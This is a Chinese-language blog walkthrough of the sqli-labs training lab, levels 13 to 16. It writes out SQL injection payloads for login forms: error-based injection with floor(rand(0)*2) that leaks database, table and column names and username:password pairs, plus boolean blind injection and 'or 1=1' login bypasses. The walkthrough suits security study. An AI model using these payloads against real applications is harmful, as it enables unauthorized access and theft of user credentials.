Less-13
尝试输入username=1',password=2'
,没反应,输入username=1",password=2"
,报错了

可知这里是')
闭合,但是构建之后输入order by 1
等语句没有回显,考虑报错注入
1') union (select count(*) from information_schema.tables group by concat((select database()),floor(rand(0)*2)))#
注入后显示超过一行,说明列不止一个,尝试加入一个列
1') union select 1,(select count(*) from information_schema.tables group by concat((select database()),floor(rand(0)*2)))#

成功爆出当前数据库为”security”,接下来就是常规操作了
爆表
1') union select 1,(select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)))#

1') union select 1,(select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),floor(rand(0)*2)))#



修改元素可爆出所有表(最后一次爆全部,后面的都这样的)
爆字段
1') union select 1,(select count(*) from information_schema.tables group by concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),floor(rand(0)*2)))#

爆数据
1') union select 1,(select count(*) from information_schema.tables group by concat((select concat(username,0x3a,password) from security.users limit 0,1),floor(rand(0)*2)))#

Less-14
尝试输入username=1',password=2'
,没反应,输入username=1",password=2"
,报错了

可知这里双引号闭合,构造pyload:2" or 1=1 #
,经测试和Less-13一样的解法
Less-15
尝试输入username=1',password=2'
,没反应,输入username=1",password=2"
,也没反应…
有可能不会报错了,尝试password=1' or 1=1 #
,发现成功登入…
这里可以利用or
性质来判断后面我们构造的payload是否正确,bool注入
爆库:
1' or (left((select database()),1)='s')#
详细bool注入参考我前面的博客,可丢bp里爆破
爆表
1' or left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e'#
Less-16
尝试输入username=1',password=2'
,登入失败,输入username=1",password=2"
,登入失败…
有可能不会报错了,尝试password=1' or 1=1 #
,登入失败,password=1" or 1=1 #
,登入失败…
继续尝试password=1") or 1=1 #
,登入成功,害…
后面就和Less-15一样了,稍微改下符号就可以了
声明:
本文采用
BY-NC-SA
协议进行授权,如无注明均为原创,转载请注明转自
迷失的老鼠
本文地址: sqli-labs Less-13 to Less-16
本文地址: sqli-labs Less-13 to Less-16